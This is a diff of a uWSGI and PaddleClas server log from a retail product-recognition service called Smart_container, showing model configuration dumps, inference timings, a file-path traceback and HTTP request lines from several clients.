01:18:58 INFO: enable_mkldnn : True -2021-11-03 01:18:58 INFO: enable_profile : False -2021-11-03 01:18:58 INFO: gpu_mem : 8000 -2021-11-03 01:18:58 INFO: image_shape : [3, 640, 640] -2021-11-03 01:18:58 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 01:18:58 INFO: ir_optim : True -2021-11-03 01:18:58 INFO: labe_list : ['foreground'] -2021-11-03 01:18:58 INFO: max_det_results : 5 -2021-11-03 01:18:58 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 01:18:58 INFO: rec_nms_thresold : 0.05 -2021-11-03 01:18:58 INFO: threshold : 0.2 -2021-11-03 01:18:58 INFO: use_fp16 : False -2021-11-03 01:18:58 INFO: use_gpu : False -2021-11-03 01:18:58 INFO: use_tensorrt : False -2021-11-03 01:18:58 INFO: IndexProcess : -2021-11-03 01:18:58 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 01:18:58 INFO: return_k : 5 -2021-11-03 
01:18:58 INFO: score_thres : 0.5 -2021-11-03 01:18:58 INFO: RecPostProcess : None -2021-11-03 01:18:58 INFO: RecPreProcess : -2021-11-03 01:18:58 INFO: transform_ops : -2021-11-03 01:18:58 INFO: ResizeImage : -2021-11-03 01:18:58 INFO: size : 224 -2021-11-03 01:18:58 INFO: NormalizeImage : -2021-11-03 01:18:58 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 01:18:58 INFO: order : -2021-11-03 01:18:58 INFO: scale : 0.00392157 -2021-11-03 01:18:58 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 01:18:58 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2478.3780574798584 ms per batch image -[{'bbox': [182, 158, 358, 381], 'rec_docs': '江小白', 'rec_scores': 0.6956786}] -{'bbox': [182, 158, 358, 381], 'rec_docs': '江小白', 'rec_scores': 0.6956786} -234 -["{'bbox': [182, 158, 358, 381], 'rec_docs': '江小白', 'rec_scores': 0.6956786}\n"] -['江小白'] -['江小白', '33'] -[pid: 30826|app: 0|req: 2/3] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 01:18:57 2021] POST /reference_client/ => generated 114 bytes in 6732 msecs (HTTP/1.1 200) 5 headers in 158 bytes (9 switches on core 0) -[pid: 30827|app: 0|req: 2/4] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 01:20:12 2021] GET / => generated 179 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 30826|app: 0|req: 3/5] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 01:20:13 2021] GET / => generated 179 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 3 11:43:58 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas +spawned uWSGI master process (pid: 10115) +spawned uWSGI worker 1 (pid: 10117, cores: 1) +spawned uWSGI worker 2 (pid: 10118, cores: 1) +spawned uWSGI worker 3 (pid: 10119, cores: 1) +spawned uWSGI worker 4 (pid: 10120, cores: 1) +spawned uWSGI worker 5 (pid: 10121, cores: 1) +spawned uWSGI worker 6 (pid: 10122, cores: 1) +spawned uWSGI worker 7 (pid: 10123, cores: 1) +spawned uWSGI worker 8 (pid: 10124, cores: 1) +spawned uWSGI 
worker 9 (pid: 10125, cores: 1) +spawned uWSGI worker 10 (pid: 10126, cores: 1) +spawned uWSGI http 1 (pid: 10127) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 21:42:08 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ machine: x86_64 clock source: unix -detected number of CPU cores: 1 +detected number of CPU cores: 2 current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid detected binary path: /usr/local/bin/uwsgi !!! no internal routing support, rebuild with pcre support !!! uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** chdir() to /root/Smart_container -your processes number limit is 7720 +your processes number limit is 15592 your memory page size is 4096 bytes detected max file descriptor number: 65535 lock engine: pthread robust mutexes @@ -1442,38 +713,40 @@ uWSGI http bound on :8001 fd 6 uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] *** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x5570734c9d30 +Python main interpreter initialized at 0x5632d8cb17e0 uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** your server socket listen backlog is limited to 100 connections your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores +mapped 801944 bytes (783 KB) for 10 cores *** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x5570734c9d30 pid: 32755 (default app) +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x5632d8cb17e0 pid: 11930 (default app) +mountpoint already configured. skip. uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** *** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 32755) -spawned uWSGI worker 1 (pid: 32757, cores: 1) -spawned uWSGI worker 2 (pid: 32758, cores: 1) -spawned uWSGI worker 3 (pid: 32759, cores: 1) -spawned uWSGI worker 4 (pid: 32760, cores: 1) -spawned uWSGI worker 5 (pid: 32761, cores: 1) -spawned uWSGI worker 6 (pid: 32762, cores: 1) -spawned uWSGI worker 7 (pid: 32763, cores: 1) -spawned uWSGI worker 8 (pid: 32764, cores: 1) -spawned uWSGI worker 9 (pid: 32765, cores: 1) -spawned uWSGI worker 10 (pid: 32766, cores: 1) -spawned uWSGI http 1 (pid: 32767) -[pid: 32763|app: 0|req: 1/1] 210.51.42.187 () {40 vars in 737 bytes} [Wed Nov 3 03:44:07 2021] GET /record => generated 0 bytes in 211 msecs (HTTP/1.1 301) 5 headers in 176 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 1/2] 210.51.42.187 () {40 vars in 739 bytes} [Wed Nov 3 03:44:08 2021] GET /record/ => generated 18 bytes in 230 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 1/3] 210.51.42.187 () {36 vars in 680 bytes} [Wed Nov 3 03:44:15 2021] GET /record/ => generated 18 bytes in 214 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 2/4] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 03:45:32 2021] GET / => generated 179 bytes in 10 
msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 2/5] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 03:45:34 2021] GET / => generated 179 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +spawned uWSGI master process (pid: 11930) +spawned uWSGI worker 1 (pid: 11932, cores: 1) +spawned uWSGI worker 2 (pid: 11933, cores: 1) +spawned uWSGI worker 3 (pid: 11934, cores: 1) +spawned uWSGI worker 4 (pid: 11935, cores: 1) +spawned uWSGI worker 5 (pid: 11936, cores: 1) +spawned uWSGI worker 6 (pid: 11937, cores: 1) +spawned uWSGI worker 7 (pid: 11938, cores: 1) +spawned uWSGI worker 8 (pid: 11939, cores: 1) +spawned uWSGI worker 9 (pid: 11940, cores: 1) +spawned uWSGI worker 10 (pid: 11941, cores: 1) +spawned uWSGI http 1 (pid: 11942) +[pid: 11941|app: 0|req: 1/1] 110.248.119.243 () {38 vars in 730 bytes} [Wed Jan 26 13:42:11 2022] GET /record/ => generated 18 bytes in 231 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 2/2] 110.248.119.243 () {36 vars in 698 bytes} [Wed Jan 26 13:43:22 2022] GET /picture => generated 179 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 3/3] 110.248.119.243 () {36 vars in 686 bytes} [Wed Jan 26 13:43:24 2022] GET /s => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 4/4] 110.248.119.243 () {36 vars in 700 bytes} [Wed Jan 26 13:43:30 2022] GET /pictures => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 5/5] 110.248.119.243 () {36 vars in 703 bytes} [Wed Jan 26 13:43:37 2022] GET /pictures/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 6/6] 110.248.119.243 () {36 vars in 699 bytes} [Wed Jan 26 13:44:14 2022] GET /images/ => generated 179 bytes in 1 msecs 
(HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) req -2021-11-03 03:48:24 INFO: +2022-01-26 13:45:06 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -1483,75 +756,234 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 03:48:24 INFO: DetPostProcess : -2021-11-03 03:48:24 INFO: DetPreProcess : -2021-11-03 03:48:24 INFO: transform_ops : -2021-11-03 03:48:24 INFO: DetResize : -2021-11-03 03:48:24 INFO: interp : 2 -2021-11-03 03:48:24 INFO: keep_ratio : False -2021-11-03 03:48:24 INFO: target_size : [640, 640] -2021-11-03 03:48:24 INFO: DetNormalizeImage : -2021-11-03 03:48:24 INFO: is_scale : True -2021-11-03 03:48:24 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:48:24 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:48:24 INFO: DetPermute : -2021-11-03 03:48:24 INFO: Global : -2021-11-03 03:48:24 INFO: batch_size : 1 -2021-11-03 03:48:24 INFO: cpu_num_threads : 10 -2021-11-03 03:48:24 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 03:48:24 INFO: enable_benchmark : True -2021-11-03 03:48:24 INFO: enable_mkldnn : True -2021-11-03 03:48:24 INFO: enable_profile : False -2021-11-03 03:48:24 INFO: gpu_mem : 8000 -2021-11-03 03:48:24 INFO: image_shape : [3, 640, 640] -2021-11-03 03:48:24 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 03:48:24 INFO: ir_optim : True -2021-11-03 03:48:24 INFO: labe_list : ['foreground'] -2021-11-03 03:48:24 INFO: max_det_results : 5 -2021-11-03 03:48:24 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 03:48:24 INFO: rec_nms_thresold : 0.05 -2021-11-03 03:48:24 INFO: threshold : 0.2 -2021-11-03 03:48:24 INFO: 
use_fp16 : False -2021-11-03 03:48:24 INFO: use_gpu : False -2021-11-03 03:48:24 INFO: use_tensorrt : False -2021-11-03 03:48:24 INFO: IndexProcess : -2021-11-03 03:48:24 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 03:48:24 INFO: return_k : 5 -2021-11-03 03:48:24 INFO: score_thres : 0.5 -2021-11-03 03:48:24 INFO: RecPostProcess : None -2021-11-03 03:48:24 INFO: RecPreProcess : -2021-11-03 03:48:24 INFO: transform_ops : -2021-11-03 03:48:24 INFO: ResizeImage : -2021-11-03 03:48:24 INFO: size : 224 -2021-11-03 03:48:24 INFO: NormalizeImage : -2021-11-03 03:48:24 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:48:24 INFO: order : -2021-11-03 03:48:24 INFO: scale : 0.00392157 -2021-11-03 03:48:24 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:48:24 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2309.2424869537354 ms per batch image +2022-01-26 13:45:06 INFO: DetPostProcess : +2022-01-26 13:45:06 INFO: DetPreProcess : +2022-01-26 13:45:06 INFO: transform_ops : +2022-01-26 13:45:06 INFO: DetResize : +2022-01-26 13:45:06 INFO: interp : 2 +2022-01-26 13:45:06 INFO: keep_ratio : False +2022-01-26 13:45:06 INFO: target_size : [640, 640] +2022-01-26 13:45:06 INFO: DetNormalizeImage : +2022-01-26 13:45:06 INFO: is_scale : True +2022-01-26 13:45:06 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 13:45:06 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 13:45:06 INFO: DetPermute : +2022-01-26 13:45:06 INFO: Global : +2022-01-26 13:45:06 INFO: batch_size : 1 +2022-01-26 13:45:06 INFO: cpu_num_threads : 1 +2022-01-26 13:45:06 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-26 13:45:06 INFO: enable_benchmark : True +2022-01-26 13:45:06 INFO: enable_mkldnn : True +2022-01-26 13:45:06 INFO: enable_profile : False +2022-01-26 13:45:06 INFO: gpu_mem : 8000 +2022-01-26 13:45:06 INFO: image_shape : [3, 640, 640] +2022-01-26 13:45:06 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-26 13:45:06 INFO: ir_optim : True +2022-01-26 13:45:06 INFO: labe_list : ['foreground'] +2022-01-26 13:45:06 INFO: max_det_results : 5 +2022-01-26 13:45:06 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-26 13:45:06 INFO: rec_nms_thresold : 0.05 +2022-01-26 13:45:06 INFO: 
threshold : 0.2 +2022-01-26 13:45:06 INFO: use_fp16 : False +2022-01-26 13:45:06 INFO: use_gpu : False +2022-01-26 13:45:06 INFO: use_tensorrt : False +2022-01-26 13:45:06 INFO: IndexProcess : +2022-01-26 13:45:06 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-26 13:45:06 INFO: return_k : 5 +2022-01-26 13:45:06 INFO: score_thres : 0.5 +2022-01-26 13:45:06 INFO: RecPostProcess : None +2022-01-26 13:45:06 INFO: RecPreProcess : +2022-01-26 13:45:06 INFO: transform_ops : +2022-01-26 13:45:06 INFO: ResizeImage : +2022-01-26 13:45:06 INFO: size : 224 +2022-01-26 13:45:06 INFO: NormalizeImage : +2022-01-26 13:45:06 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 13:45:06 INFO: order : +2022-01-26 13:45:06 INFO: scale : 0.00392157 +2022-01-26 13:45:06 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 13:45:06 INFO: ToCHWImage : None +Inference: 422.6183891296387 ms per batch image +[] +Traceback (most recent call last): + File "/root/Smart_container/PaddleClas/deploy/python/predict_client.py", line 157, in + main(config) + File "/root/Smart_container/PaddleClas/deploy/python/predict_client.py", line 142, in main + with open('/home/ubuntu/Smart_container/PaddleClas/dataset/log_client.txt','a+',encoding='utf8') as f: +FileNotFoundError: [Errno 2] No such file or directory: '/home/ubuntu/Smart_container/PaddleClas/dataset/log_client.txt' +234 +[pid: 11941|app: 0|req: 7/7] 49.79.96.123 () {34 vars in 446 bytes} [Wed Jan 26 13:45:05 2022] POST /reference_client/ => generated 145 bytes in 3185 msecs (HTTP/1.1 500) 6 headers in 184 bytes (16 switches on core 0) +[pid: 11941|app: 0|req: 8/8] 110.248.119.243 () {36 vars in 699 bytes} [Wed Jan 26 13:45:56 2022] GET /gallery => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 9/9] 110.248.119.243 () {36 vars in 701 bytes} [Wed Jan 26 13:46:15 2022] GET /gallery/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 
bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 10/10] 110.248.119.243 () {38 vars in 732 bytes} [Wed Jan 26 13:46:17 2022] GET /gallery/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 22:29:36 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /root/Smart_container +your processes number limit is 15592 +your memory page size is 4096 bytes +detected max file descriptor number: 65535 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x55fee94557d0 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x55fee94557d0 pid: 12448 (default app) +mountpoint already configured. skip. +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 12448) +spawned uWSGI worker 1 (pid: 12450, cores: 1) +spawned uWSGI worker 2 (pid: 12451, cores: 1) +spawned uWSGI worker 3 (pid: 12452, cores: 1) +spawned uWSGI worker 4 (pid: 12453, cores: 1) +spawned uWSGI worker 5 (pid: 12454, cores: 1) +spawned uWSGI worker 6 (pid: 12455, cores: 1) +spawned uWSGI worker 7 (pid: 12456, cores: 1) +spawned uWSGI worker 8 (pid: 12457, cores: 1) +spawned uWSGI worker 9 (pid: 12458, cores: 1) +spawned uWSGI worker 10 (pid: 12459, cores: 1) +spawned uWSGI http 1 (pid: 12460) +[pid: 12459|app: 0|req: 1/1] 110.248.119.243 () {38 vars in 709 bytes} [Wed Jan 26 14:36:23 2022] GET / => generated 179 bytes in 232 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 2/2] 2.57.121.59 () {34 vars in 400 bytes} [Wed Jan 26 14:36:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 3/3] 110.248.119.243 () {40 vars in 688 bytes} [Wed Jan 26 14:36:31 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 4/4] 94.25.170.211 () {32 vars in 464 bytes} [Wed Jan 26 15:00:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 5/5] 101.89.239.238 () {32 vars in 499 bytes} [Wed 
Jan 26 15:22:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 6/6] 47.102.129.27 () {34 vars in 502 bytes} [Wed Jan 26 15:35:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 7/7] 176.97.210.244 () {28 vars in 311 bytes} [Wed Jan 26 16:00:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 8/8] 176.97.210.244 () {40 vars in 663 bytes} [Wed Jan 26 16:00:23 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 9/9] 49.79.96.123 () {36 vars in 799 bytes} [Wed Jan 26 16:06:28 2022] POST /search/ => generated 20175 bytes in 13 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 10/10] 83.97.20.34 () {26 vars in 287 bytes} [Wed Jan 26 16:22:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 11/11] 107.189.29.181 () {28 vars in 311 bytes} [Wed Jan 26 16:30:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12458|app: 0|req: 1/12] 107.189.29.181 () {40 vars in 672 bytes} [Wed Jan 26 16:30:57 2022] POST /HNAP1/ => generated 179 bytes in 240 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 12/13] 104.206.128.66 () {30 vars in 373 bytes} [Wed Jan 26 16:31:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +2022-01-26 16:38:20 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-26 16:38:20 INFO: Global : +2022-01-26 16:38:20 INFO: batch_size : 32 +2022-01-26 16:38:20 INFO: cpu_num_threads : 1 +2022-01-26 16:38:20 INFO: enable_benchmark : True +2022-01-26 16:38:20 INFO: enable_mkldnn : True +2022-01-26 16:38:20 INFO: enable_profile : False +2022-01-26 16:38:20 INFO: gpu_mem : 8000 +2022-01-26 16:38:20 INFO: ir_optim : True +2022-01-26 16:38:20 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-26 16:38:20 INFO: use_fp16 : False +2022-01-26 16:38:20 INFO: use_gpu : False +2022-01-26 16:38:20 INFO: use_tensorrt : False +2022-01-26 16:38:20 INFO: IndexProcess : +2022-01-26 16:38:20 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-01-26 16:38:20 INFO: delimiter : +2022-01-26 16:38:20 INFO: dist_type : IP +2022-01-26 16:38:20 INFO: embedding_size : 512 +2022-01-26 16:38:20 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-01-26 16:38:20 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-26 16:38:20 INFO: index_method : HNSW32 +2022-01-26 16:38:20 INFO: index_operation : new +2022-01-26 16:38:20 INFO: RecPostProcess : None +2022-01-26 16:38:20 INFO: RecPreProcess : +2022-01-26 16:38:20 INFO: transform_ops : +2022-01-26 16:38:20 INFO: ResizeImage : +2022-01-26 16:38:20 INFO: size : 224 +2022-01-26 16:38:20 INFO: NormalizeImage : +2022-01-26 16:38:20 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:38:20 INFO: order : +2022-01-26 16:38:20 INFO: scale : 0.00392157 +2022-01-26 16:38:20 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:38:20 INFO: ToCHWImage : None + 0%| | 0/190 [00:00 generated 34 bytes in 6444 msecs (HTTP/1.1 200) 5 headers in 157 bytes (19 switches on core 0) +2022-01-26 16:38:37 INFO: 
+=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-26 16:38:37 INFO: DetPostProcess : +2022-01-26 16:38:37 INFO: DetPreProcess : +2022-01-26 16:38:37 INFO: transform_ops : +2022-01-26 16:38:37 INFO: DetResize : +2022-01-26 16:38:37 INFO: interp : 2 +2022-01-26 16:38:37 INFO: keep_ratio : False +2022-01-26 16:38:37 INFO: target_size : [640, 640] +2022-01-26 16:38:37 INFO: DetNormalizeImage : +2022-01-26 16:38:37 INFO: is_scale : True +2022-01-26 16:38:37 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:38:37 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:38:37 INFO: DetPermute : +2022-01-26 16:38:37 INFO: Global : +2022-01-26 16:38:37 INFO: batch_size : 1 +2022-01-26 16:38:37 INFO: cpu_num_threads : 1 +2022-01-26 16:38:37 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-26 16:38:37 INFO: enable_benchmark : True +2022-01-26 16:38:37 INFO: enable_mkldnn : True +2022-01-26 16:38:37 INFO: enable_profile : False +2022-01-26 16:38:37 INFO: gpu_mem : 8000 +2022-01-26 16:38:37 INFO: image_shape : [3, 640, 640] +2022-01-26 16:38:37 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-01-26 16:38:37 INFO: ir_optim : True +2022-01-26 16:38:37 INFO: labe_list : ['foreground'] +2022-01-26 16:38:37 INFO: max_det_results : 5 +2022-01-26 16:38:37 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-26 16:38:37 INFO: rec_nms_thresold : 0.05 +2022-01-26 16:38:37 INFO: threshold : 0.2 +2022-01-26 16:38:37 INFO: use_fp16 : False +2022-01-26 16:38:37 INFO: use_gpu : False +2022-01-26 16:38:37 
INFO: use_tensorrt : False +2022-01-26 16:38:37 INFO: IndexProcess : +2022-01-26 16:38:37 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-26 16:38:37 INFO: return_k : 5 +2022-01-26 16:38:37 INFO: score_thres : 0.5 +2022-01-26 16:38:37 INFO: RecPostProcess : None +2022-01-26 16:38:37 INFO: RecPreProcess : +2022-01-26 16:38:37 INFO: transform_ops : +2022-01-26 16:38:37 INFO: ResizeImage : +2022-01-26 16:38:37 INFO: size : 224 +2022-01-26 16:38:37 INFO: NormalizeImage : +2022-01-26 16:38:37 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:38:37 INFO: order : +2022-01-26 16:38:37 INFO: scale : 0.00392157 +2022-01-26 16:38:37 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:38:37 INFO: ToCHWImage : None +Inference: 373.3198642730713 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 3/6] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 03:48:23 2021] POST /reference_client/ => generated 98 bytes in 